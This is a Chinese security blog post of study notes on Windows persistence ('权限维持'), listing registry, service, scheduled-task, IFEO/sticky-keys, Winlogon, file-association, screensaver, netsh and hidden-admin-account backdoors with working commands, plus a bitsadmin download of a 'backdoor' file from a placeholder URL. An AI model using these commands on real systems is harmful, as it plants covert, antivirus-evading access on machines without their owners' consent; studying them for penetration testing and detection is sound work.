<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      Windows权限维持学习 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ghostasky</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        Windows权限维持学习
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2022-03-08
      </span>

                                                                        <span class="post-pubtime"> 本文共2.5k字 </span>

                                                                        <span class="post-pubtime">
        大约需要14min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/%E6%B8%97%E9%80%8F/" title="渗透">
            <b>#</b> 渗透
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>[toc]</p>
<p>简单记录下Windows权限维持的内容。</p>
<h1 id="0x1-辅助功能镜像劫持"><a href="#0x1-辅助功能镜像劫持" class="headerlink" title="0x1 辅助功能镜像劫持"></a>0x1 辅助功能镜像劫持</h1><p>先前的版本可以直接更换：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">屏幕键盘： C:\Windows\System32\osk.exe</span><br><span class="line">放大镜： C:\Windows\System32\Magnify.exe</span><br><span class="line">旁白： C:\Windows\System32\Narrator.exe</span><br><span class="line">显示切换器 C:\Windows\System32\DisplaySwitch.exe</span><br><span class="line">应用切换器： C:\Windows\System32\AtBroker.exe</span><br></pre></td></tr></table></figure>

<p>直接命令行：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">copy c:\windows\system32\sethc.ex c:\windows\system32\sethc1.exe</span><br><span class="line">copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe</span><br></pre></td></tr></table></figure>

<p>高版本需要IFEO。所谓的IFEO就是Image File Execution Options，直译过来就是映像劫持。它又被称为“重定向劫持”（Redirection Hijack），它和“映像劫持”（Image Hijack，或IFEO Hijack）只是称呼不同，实际上都是一样的技术手段。白话来讲就是做某个操作的时候被拦截下来，干了别的事。</p>
<p>在iexplorer.exe中加键值对：debugger  c:\windows\system32\cmd.exe</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308172433830.png" alt="image-20220308172433830"></p>
<p>或者直接命令行(需要管理员权限)：</p>
<p><code>reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe&quot; /v &quot;Debugger&quot; /t REG_SZ /d &quot;c:\windows\system32\cmd.exe&quot; /f</code></p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308172741639.png" alt="image-20220308172741639"></p>
<h1 id="0x2-启动项-x2F-服务后门"><a href="#0x2-启动项-x2F-服务后门" class="headerlink" title="0x2.启动项&#x2F;服务后门"></a>0x2.启动项&#x2F;服务后门</h1><h2 id="开始菜单启动项"><a href="#开始菜单启动项" class="headerlink" title="开始菜单启动项"></a>开始菜单启动项</h2><p>开始菜单启动项，指示启动文件夹的位置，具体的位置是“开始”菜单中的“所有程序”-“启动”选项：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\SD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</span><br></pre></td></tr></table></figure>

<p>相关键值：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders </span><br><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders </span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders </span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</span><br></pre></td></tr></table></figure>

<p>重启后会自动自启</p>
<h2 id="启动项注册表后门"><a href="#启动项注册表后门" class="headerlink" title="启动项注册表后门"></a>启动项注册表后门</h2><p><code>HKEY_CURRENT_USER</code>的改动不需要管理员权限。（更改<code>HKEY_LOCAL_MACHINE</code>需要管理员权限）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span><br><span class="line">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</span><br><span class="line">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</span><br><span class="line">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308175519252.png" alt="image-20220308175519252"></p>
<p>同样，重启后会自启动。</p>
<p>使用命令行，修改hklm，需要管理员：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run   /v &quot;123&quot; /t REG_SZ /d &quot;C:\Windows\System32\cmd.exe&quot; /f</span><br></pre></td></tr></table></figure>

<h2 id="自启动服务后门"><a href="#自启动服务后门" class="headerlink" title="自启动服务后门"></a>自启动服务后门</h2><blockquote>
<p>  在 Windows上还有一个重要的机制，也就是服务。服务程序通常默默的运行在后台，且拥有 SYSTEM 权限，非常适合用于后门持久化。我们可以将 EXE &#x2F;DLL等可执行文件注册为服务实现后门持久化。</p>
</blockquote>
<p>可以通过如下命令行方式添加一个服务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sc create asdfadfa binpath=   &quot;C:\Users\SD\Desktop\test.exe&quot;  start= &quot;auto&quot; obj=&quot;LocalSystem&quot;</span><br><span class="line">sc start asdfadfa </span><br></pre></td></tr></table></figure>

<p>删除服务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc delete asdfadfa</span><br></pre></td></tr></table></figure>

<p>或者powershell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">New-Service -Name &quot;pentestlab&quot; -BinaryPathName &quot;C:\temp\pentestlab.exe&quot; -Description &quot;PentestLaboratories&quot; -StartupType Automatic</span><br><span class="line">sc start pentestlab</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308181535484.png" alt="image-20220308181535484"></p>
<h1 id="0x3-系统计划任务后门"><a href="#0x3-系统计划任务后门" class="headerlink" title="0x3.系统计划任务后门"></a>0x3.系统计划任务后门</h1><blockquote>
<p>  Windows实现定时任务主要有schtasks与at二种方式:</p>
<p>  At 适用于windows xp&#x2F;2003，Schtasks适用于win7&#x2F;2008或者以后</p>
</blockquote>
<p><code>taskschd.msc</code></p>
<p>5min执行一次</p>
<p><code>schtasks /create /sc minute /mo 5   /tn &quot;aaaa&quot; /tr C:\Windows\System32\cmd.exe</code></p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308182919522.png" alt="image-20220308182919522"></p>
<h1 id="0x4-DLL劫持"><a href="#0x4-DLL劫持" class="headerlink" title="0x4.DLL劫持"></a>0x4.DLL劫持</h1><blockquote>
<p>  DLL劫持漏洞之所以被称为漏洞，还要从负责加载DLL的系统API LoadLibrary 来看。熟悉Windows代 码的同学都知道，调⽤ LoadLibrary 时可以使⽤DLL的相对路径。这时，系统会按照特定的顺序搜索⼀ 些⽬录，以确定DLL的完整路径。根据MSDN⽂档的约定，在使⽤相对路径调⽤ LoadLibrary （同样适 ⽤于其他同类DLL LoadLibraryEx，ShellExecuteEx等）时，系统会依次从以下6个位置去查找所需要的 DLL⽂件（会根据SafeDllSearchMode配置⽽稍有不同）。</p>
<ol>
<li>程序所在⽬录。</li>
<li>加载 DLL 时所在的当前⽬录。</li>
<li>系统⽬录即 SYSTEM32 ⽬录。</li>
<li>16位系统⽬录即 SYSTEM ⽬录。</li>
<li>Windows⽬录。</li>
<li>PATH环境变量中列出的⽬录</li>
</ol>
<p>  dll劫持就发⽣在系统按照顺序搜索这些特定⽬录时。只要⿊客能够将恶意的DLL放在优先于正常DLL所在的⽬录，就能够欺骗系统优先加载恶意DLL，来实现“劫持”。</p>
</blockquote>
<p>在win7及win7以上系统增加了KnownDLLs保护，需要在如下注册表下添加dll才能顺利劫持：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/225911">DLL劫持原理及其漏洞挖掘（一）</a></p>
<h1 id="0x5-Winlogon用户登录初始化"><a href="#0x5-Winlogon用户登录初始化" class="headerlink" title="0x5.Winlogon用户登录初始化"></a>0x5.Winlogon用户登录初始化</h1><p>winlogon.exe是windows中非常重要的进程,在用户还没登录系统之前就已经存在,并与密码验证相关的重要任务精密相关。例如，当在用户登录时，Winlogon 进程负责将用户配置文件加载到注册表中:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\</span><br><span class="line">HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</span><br></pre></td></tr></table></figure>

<p>命令行:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">reg delete &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v Userinit /f</span><br><span class="line">reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;  /v &quot;Userinit&quot; /t REG_SZ /d &quot;C:\Windows\system32\cmd.exe,&quot; /f</span><br></pre></td></tr></table></figure>

<p>powershell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Set-ItemProperty   &quot;HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon&quot; -name   Userinit -value &quot;C:\Windows\system32\userinit.exe,C:\Windows\system32\cmd.exe&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308184001989.png" alt="image-20220308184001989"></p>
<h1 id="0x6-Logon-Scripts后门"><a href="#0x6-Logon-Scripts后门" class="headerlink" title="0x6.Logon Scripts后门"></a>0x6.Logon Scripts后门</h1><p>Windows登录脚本，当用户登录时触发，<strong>Logon Scripts能够优先于杀毒软件执行，绕过杀毒软件对敏感操作的拦截</strong>。</p>
<p>注册表位置:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Environment</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308184533410.png" alt="image-20220308184533410"></p>
<h1 id="0x7-文件关联"><a href="#0x7-文件关联" class="headerlink" title="0x7.文件关联"></a>0x7.文件关联</h1><p>文件关联就是将一种类型的文件与一个可以打开它的程序建立起一种依存关系，一个文件可以与多个应用程序发生关联。</p>
<p>可以用assoc命令显示或修改文件扩展名关联，使用ftype显示或修改文件类型</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308185550636.png" alt="image-20220308185550636"></p>
<p>需要管理员权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKCR\txtfile\shell\open\command&quot; /ve /t REG_EXPAND_SZ /d &quot;C:\Windows\system32\cmd.exe %1&quot; /f</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308185838423.png" alt="image-20220308185838423"></p>
<h1 id="0x8-Bitsadmin"><a href="#0x8-Bitsadmin" class="headerlink" title="0x8.Bitsadmin"></a>0x8.Bitsadmin</h1><blockquote>
<p>  <a target="_blank" rel="noopener" href="https://toutiao.io/posts/bcz5e1o/preview">BITSAdmin的介绍与Windows渗透测试中的使用</a></p>
<p>  <a target="_blank" rel="noopener" href="https://micro8.gitbook.io/micro8/contents-1/41-50/41bitsadmin-yi-ju-hua-xia-zai-payload">bitsadmin一句话下载payload</a></p>
</blockquote>
<blockquote>
<p>  Windows操作系统包含各种实用程序，系统管理员可以使用它们来执行各种任务。这些实用程序之一是后台智能传输服务（BITS），它可以促进文件到Web服务器（HTTP）和共享文件夹（SMB）的传输能力。Microsoft提供了一个名为“ bitsadmin ” 的二进制文件和PowerShell cmdlet，用于创建和管理文件传输。</p>
</blockquote>
<p>window7以上自带：<code>c:\windows\system32\bitsadmin.exe</code></p>
<p>使用功能transfer参数下载</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\bitsadmin.exe /transfer backdoor &quot;http://sssssssss/CM.EXE&quot; C:\1.exe</span><br></pre></td></tr></table></figure>

<p>复制本地文件：</p>
<p>BITSAdmin遵循文件传输的原则。因此，可以将其用作复制和粘贴命令。这意味着BITSAdmin也能将同一台计算机上的一个位置传输到另一个位置。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /create whitehat_day <span class="comment">#创建一个whitehat_day的任务。</span></span><br><span class="line"><span class="comment">#使用/addfile参数将传输文件添加到whitehat_day任务中，并声明传输的文件名与路径，和保存位置与名称</span></span><br><span class="line">bitsadmin /addfile whitehat_day d:\file.txt d:\testfile.txt</span><br><span class="line">bitsadmin /resume whitehat_day<span class="comment">#使用/resume参数来开启传输。</span></span><br><span class="line">bitsadmin /complete whitehat_day<span class="comment">#以临时文件的形式传输文件。要获取完整的文件，需要使用/complete参数</span></span><br><span class="line">Get-ChildItem -Path d:\  <span class="comment">#查看目标路径下是否存在file.txt</span></span><br></pre></td></tr></table></figure>

<h1 id="0x9-屏幕保护程序"><a href="#0x9-屏幕保护程序" class="headerlink" title="0x9.屏幕保护程序"></a>0x9.屏幕保护程序</h1><blockquote>
<p>  利用前提:对方开启了屏幕保护</p>
<p>  屏幕保护程序，当初的设计是为了防止长期屏幕的显示，预防老化与缩短屏幕显示器老化的一种保护程序。</p>
</blockquote>
<p>注册表位置:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive</span><br><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaverIsSecure</span><br><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut</span><br><span class="line">HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v SCRNSAVE.EXE /d C:\Users\hunter\Desktop\beacon.exe /f</span><br><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v ScreenSaveActive /d 1 /f</span><br><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v ScreenSaverIsSecure /d 0 /f</span><br><span class="line">reg add &quot;hkcu\control panel\desktop&quot; /v ScreenSaveTimeOut /d 60 /f</span><br></pre></td></tr></table></figure>

<p>如果从未设置过屏保程序的话，除“ScreenSaveActive”默认值为1，其他键都是不存在的，而屏保程序的正常运行必须保证这几个键都有数据才可以，因此必须把4个键都重写一遍。另外，经测试屏保程序最短触发时间为60秒，即使改成小于60的数值，依然还是60秒后执行程序。<br>当然，从注册表路径也可以看出这种方式只能获得当前用户权限的shell，优点是不需要提权即可维持。</p>
<h1 id="0xA-WMI构造无文件后门（待完成）"><a href="#0xA-WMI构造无文件后门（待完成）" class="headerlink" title="0xA WMI构造无文件后门（待完成）"></a>0xA WMI构造无文件后门（待完成）</h1><p>WMI(Windows Management Instrumentation，即Windows管理规范)，大多数基于Windows的软件依赖于此服务。</p>
<blockquote>
<p>  <a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/WMI%20%E7%9A%84%E6%94%BB%E5%87%BB%EF%BC%8C%E9%98%B2%E5%BE%A1%E4%B8%8E%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E4%B9%8B%E6%94%BB%E5%87%BB%E7%AF%87.html">WMI的攻击，防御与取证分析技术之攻击篇</a></p>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2080">wmi与vbs</a></p>
<p>  <a target="_blank" rel="noopener" href="https://m0nst3r.me/pentest/%E5%88%A9%E7%94%A8WMI%E6%9E%84%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%8C%81%E4%B9%85%E5%8C%96%E7%9A%84%E5%BC%82%E6%AD%A5%E7%9A%84%E6%97%A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8.html">利用WMI构建一个持久化的异步的无文件后门</a></p>
<p>  <a target="_blank" rel="noopener" href="https://blog.51cto.com/antivirusjo/2092545">WMI利用专题</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/88851">Powershell攻击指南黑客后渗透之道系列——进阶利用</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html">A WMI Based Agentless Post-Exploitation RAT Developed in PowerShell</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.tuicool.com/articles/zmUVbyJ">WMI Backdoor</a></p>
<p>  <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor">Appendix L: Events to Monitor</a></p>
<p>  <a target="_blank" rel="noopener" href="http://demon.tw/copy-paste/vbs-wmi-trojan-3.html">利用WMI打造完美“三无”后门</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.tuicool.com/articles/IzieuyR">如何检测并移除WMI持久化后门？</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/85851">解析APT29的无文件WMI和PowerShell后门</a></p>
<p>  <a target="_blank" rel="noopener" href="https://www.aqniu.com/learn/31053.html">无文件攻击的兴起与应对之道</a></p>
</blockquote>
<h1 id="0xB-影子用户"><a href="#0xB-影子用户" class="headerlink" title="0xB.影子用户"></a>0xB.影子用户</h1><p>即创建的隐藏用户，它无法通过普通命令进行查询，比较隐蔽。（要管理员）</p>
<p>创建个隐藏用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user test$ 123456 /add</span><br><span class="line">net localgroup administrators test$ /add</span><br></pre></td></tr></table></figure>

<p>net user无法查看</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308193032710.png" alt="image-20220308193032710"></p>
<p>但是可以在计算机管理和登陆页面中看到</p>
<p>下面解决这个问题：</p>
<p>修改<code>HKEY_LOCAL_MACHINE\SAM\SAM</code> admin的权限为完全控制和读取，重新打开后导出3个内容：</p>
<p>test$导出为1.reg<br>000003EC包含test$用户的F值，导出另存为2.reg<br>000003E9包含WIN10用户的F值，导出另存为3.reg</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308194155751.png" alt="image-20220308194155751"></p>
<p>将2.reg中的F值替换为3.reg中的F值，即将test$用户的F值替换为WIN10用户的F值.</p>
<p>删除test$用户，之后注册表就 无法打开了，导入1,2注册表：</p>
<p><img src="/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/image-20220308194707146.png" alt="image-20220308194707146"></p>
<p>这时登陆界面已经没有账户了，3389可以直接登陆，以test$用户登陆，登陆之后的身份是原来WIN10用户，桌面也是原用户的，达到克隆效果。这个时候再用<code>net user test$ /del</code>是删除不掉这个用户的，只能通过注册表来删除。</p>
<h1 id="0xC-Netsh"><a href="#0xC-Netsh" class="headerlink" title="0xC.Netsh"></a>0xC.Netsh</h1><p>权限要求：未降权的管理员权限。<br>netsh也是Windows自带的命令，是用来配置网络的命令行工具。该工具可以通过导入helperdll的方式实现功能，且DLL导入后会写进注册表，永久有效.</p>
<p>关于<code>helper dll</code>的编写可以参考这个项目：<a target="_blank" rel="noopener" href="https://github.com/outflanknl/NetshHelperBeacon">NetshHelperBeacon</a></p>
<p>注册表位置：<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh</code></p>
<p>netsh并不会开启自启动，因此还要再写一条自启动项：<br><code>reg add &quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&quot; /v Pentestlab /t REG_SZ /d &quot;cmd /c C:\Windows\System32\netsh&quot;</code></p>
<blockquote>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9718">Windows权限维持总结</a></p>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/8095">Windows权限维持整理</a></p>
<p>  <a target="_blank" rel="noopener" href="https://bypass007.github.io/Emergency-Response-Notes/privilege/">权限维持篇</a></p>
<p>  <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6461">windows中常见后门持久化方法总结</a></p>
</blockquote>

                                                                    </div>
                                                                    
                                                                        <div class="prev-or-next">
                                                                            <div class="post-foot-next">
                                                                                
                                                                                    <a href="/2022/03/01/Nodejs%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" target="_self">
                                                                                        <i class="iconfont icon-chevronleft"></i>
                                                                                        <span>Prev</span>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                            <div class="post-attach">
                                                                                <!-- <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2022-03-08
            </span> -->

                                                                                
                                                                                            <span class="post-categories">
          <!-- <i class="iconfont icon-bookmark" title="Categories"></i> -->
          
          <!-- <span class="span--category">
            <a href="/categories/Technology/" title="Technology">
              <b>#</b> Technology
            </a>
          </span> -->
                                                                                            
                                                                                                </span>
                                                                                                
                                                                                    <span class="post-tags">
          <!-- <i class="iconfont icon-tags" title="Tags"></i> -->
          
          <!-- <span class="span--tag">
            <a href="/tags/%E6%B8%97%E9%80%8F/" title="渗透">
              <b>#</b> 渗透
            </a>
          </span> -->
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            </div>
                                                                            <div class="post-foot-prev">
                                                                                
                                                                                    <a href="/2022/03/19/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F&%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" target="_self">
                                                                                        <span>Next</span>
                                                                                        <i class="iconfont icon-chevronright"></i>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                        </div>
                                                                        
                                                                </div>
                                                                
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
